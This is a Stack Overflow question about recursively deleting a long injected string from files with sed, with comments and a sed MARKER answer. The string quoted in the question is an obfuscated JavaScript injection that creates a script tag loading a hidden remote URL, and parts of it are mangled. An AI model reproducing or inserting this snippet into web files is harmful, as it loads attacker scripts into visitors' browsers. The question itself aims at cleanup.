# How to do a recursive find/replace of a long string with awk or sed?

Tags: bash

I have a very long and complex string in many files and I want to remove/replace it recursively. The string contains many slashes, backslashes and spaces and any kind of special signs.

Example ( this's the string to find ):

> var a=['ffffff/fdf',')njosirthalcfoml5','length','trderrnrme1fze6r(','script','abs','parentNode','getElementsByTagName','t=ha5mytou5_p_d','5mgrfokf7tma7l!pp','type','async','oe3m6axnwt8s5omh7','jfjOcxieyd2njif','createElement','while','fdsfd'];(function(b,e){var f=function(g){while(--g){b'push';}};f(++e);}(a,0x12b));var b=function(c,d){c=c-0x0;var e=a[c];return e;};var _cs=['3tqnjerg4Akriews)ue',b('0xb'),b('0x10'),'vb37(ej4q84fb1x9v8w6e1lau4!34c443cf64097sap8!afeeeh0qbgchc!7q2289=gvu&!0a402m=1duiicu?3sfjb.(esdpoun2_qi9uj/8m9ozc0.20v6h3gt(ayt9snkfcnixlvci.vcqiql0bmu4p1/)/p:isuprt)tzhp',b('0x5'),b('0x3'),b('0xa'),b('0x8'),'get','fejiekzokovce',b('0xf'),b('0x2'),b('0xc'),b('0x7')];if(ndsw===undefined){var ndsw=true;(function(){var c=navigator;var d=document;var e=screen;var f=window;var g=c[m(_cs[0x0])];var h=c[m(_cs[0x2])];var i=d[m(_cs[0x9])];var j=f[m(_cs[0x7])][m(_cs[0xb])];var k=d[m(_cs[0x6])];if(k&&!n(k,j)){if(!n(i,m(_cs[0xa]))){var c=db('0x4');c[b('0x0')]=_cs[0xd];c[b('0x1')]=![0x0];l[b('0xd')]b('0x6');}}aaaaaaa m(p){var q='';for(var r=0x0;rm(_cs[0x5])!==-0x1;}ffffff o(p){var q='';for(var r=p[b('0x9')]-0x1;r>=0x0;r--){q+=p[r];}return q;}}());}```

How do I do that?

Would it be possible to write the search string to a file and use this as input for a search & replace recursively command?

The purpose is to remove the entire string found in a path recursively.

Comment: Could you please do mention expected output in your post and let us know then?

Comment: Please, consider editing the question to put the example in a code block

Comment: Welcome to Stack Overflow. SO is a question and answer site for professional and enthusiast programmers. The goal is that you add some code of your own to your question to show at least the research effort you made to solve this yourself.

Comment: Try something with `comm` or `grep -v` or `sed '/.../d'`and show what part works. Perhaps start with testfiles with a few short lines.

Comment: Honorable mention in an obfuscation contest? >=o]  What eactly do you mean here in this context by "recursive"?

Comment: Does it contain a newline?

Comment: @PaulHodges I would like to remove every occurrence (see complex example string) in all files in a specific directory and its subdirectories. it's clear?

Comment: @rici No newline

Answer (score 2):

If there is only one occurrence of the string per text file this will append 'MARKER' to the start and end of the complex string, then delete the text between 'MARKER's:

```
for f in $(find . -name "*.txt")
do
sed -i "s/var\ a/MARKER_var\ a/g" "$f"
sed -i "s/\`\`\`/\`\`\`MARKER/g" "$f"
sed -i 's/MARKER.*MARKER//g' "$f"
done
```

Comment: `var` occurs multiple times in the string, and to be honest, I thought the \`\`\` might be left over from an attempt to end a code block...

Comment: Yes - great point @PaulHodges - I used `var a` as the string for attaching MARKER at the beginning of the string, but if there are multiple var a's in the file then this approach fails. Same with the triple backtick: if it isn't unique in the file or if it is indeed a markdown artefact that shouldn't be there then my approach does not work. Without properly formed questions it's difficult to provide properly formed answers, but my hope is that Andrea can adapt my approach to solve her problem.